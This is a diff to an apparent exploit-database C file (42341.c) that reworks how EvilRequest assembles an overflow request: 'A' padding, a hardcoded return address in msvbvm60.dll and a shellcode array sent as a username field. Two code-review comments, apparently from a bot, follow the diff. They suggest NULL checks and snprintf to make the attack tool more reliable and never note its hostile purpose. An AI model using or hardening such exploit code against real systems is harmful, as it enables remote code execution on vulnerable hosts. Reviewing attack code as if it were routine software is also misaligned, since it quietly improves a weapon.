diff --git a/exploits/windows/dos/42341.c b/exploits/windows/dos/42341.c
index 6daac8996..c3cdac3b2 100644
--- a/exploits/windows/dos/42341.c
+++ b/exploits/windows/dos/42341.c
@@ -62,9 +62,10 @@ void EvilRequest() {
 "Content-Length: ";
 char request_two[] = "\r\n\r\nusername=";
- char *padding = malloc(780);
- memset(padding, 0x41, 780);
- memset(padding + 778, 0x00, 2);
+ int initial_buffer_size = 780;
+ char *padding = malloc(initial_buffer_size);
+ memset(padding, 0x41, initial_buffer_size);
+ memset(padding + initial_buffer_size - 1, 0x00, 1);
 unsigned char retn[] = "\xcb\x75\x52\x73"; //ret at msvbvm60.dll
 unsigned char shellcode[] =
@@ -96,10 +97,10 @@ void EvilRequest() {
 char request_three[] = "&password=A";
- int buffer_length = strlen(request_one) + 780 + strlen(retn) + strlen(request_two) + strlen(shellcode) + strlen(request_three);
- int content_length = 9 + 780 + strlen(retn) + strlen(shellcode) + strlen(request_three);
+ int content_length = 9 + strlen(padding) + strlen(retn) + strlen(shellcode) + strlen(request_three);
 char *content_length_string = malloc(15);
 sprintf(content_length_string, "%d", content_length);
+ int buffer_length = strlen(request_one) + strlen(content_length_string) + initial_buffer_size + strlen(retn) + strlen(request_two) + strlen(shellcode) + strlen(request_three);
 char *buffer = malloc(buffer_length);
 memset(buffer, 0x00, buffer_length);
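Review bot: `padding` is handed to `memset` immediately after `malloc(initial_buffer_size)` with no NULL check, so an allocation failure turns into a null-pointer write inside the tool itself; a guard such as `if (padding == NULL) return;` belongs before the first `memset`. The single terminator byte reads more clearly as `padding[initial_buffer_size - 1] = '\0';` than as a one-byte `memset`. Since `initial_buffer_size` is only ever used as a size, `const size_t` would suit it better than `int`. EvilRequest() starts and ends outside this hunk, so whether `padding` is freed later cannot be seen from here.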
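Review bot: `content_length` and `buffer_length` now express the padding size in two different ways, `strlen(padding)` and `initial_buffer_size`, which differ by the terminator byte. Assuming the parts are concatenated into `buffer` further down (outside this hunk), that one-byte difference appears to be the only room left for the string terminator, so it deserves a comment such as `/* initial_buffer_size == strlen(padding) + 1; the extra byte holds buffer's terminator */`. The bare `9` would be easier to follow as `strlen("username=")`. The unchecked `malloc(15)` followed by `sprintf` is safer as `snprintf(content_length_string, 15, "%d", content_length);` behind a NULL check.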